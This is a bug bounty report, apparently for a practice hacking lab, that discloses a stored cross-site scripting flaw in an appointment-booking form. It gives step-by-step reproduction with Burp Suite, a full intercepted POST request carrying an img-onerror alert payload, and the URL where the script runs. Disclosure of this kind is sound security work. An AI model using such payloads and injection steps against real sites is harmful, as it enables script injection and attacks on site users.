BugBountyHunter

Hello, I found a XSS vulnerability on /api/ambulances.php?select=.

When making a book Appointment, First name and last name are vulnerable to XSS.

To reproduce:

1. When making a book Appointment, Burp suite intercept ON

2. Fill all the require info and click Book Appointment.

3. On the intercept request, change first name ( fname ) value to fname=test<img+src=x+onerror=alert(0)>

4. And add this parameter ambulance=1 in the request to enabled for ambulance.

The intercept request like

POST /api/ba.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 73412-7048-28167
Content-Length: 198
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/book-appointment.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fname=test<img+src=x+onerror=alert(0)>&lname=test<h2&address=test<h2&city=test<h2&phonenumber=test<h2&email=test<h2&dob=12/04/2022&a1=test<h2&a2=test<h2&a3=test<h2&message=test<h2&slot=3&ambulance=1

5. Forward the request and copy your AppointmentID. ( My AppointmentID is 5343f452-5a7d-424a-abc4-87f2063ccdc6 )

6. Then visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/api/ambulances.php?select=5343f452-5a7d-424a-abc4-87f2063ccdc6 ( you need to add your ID)

7. You will see XSS executes.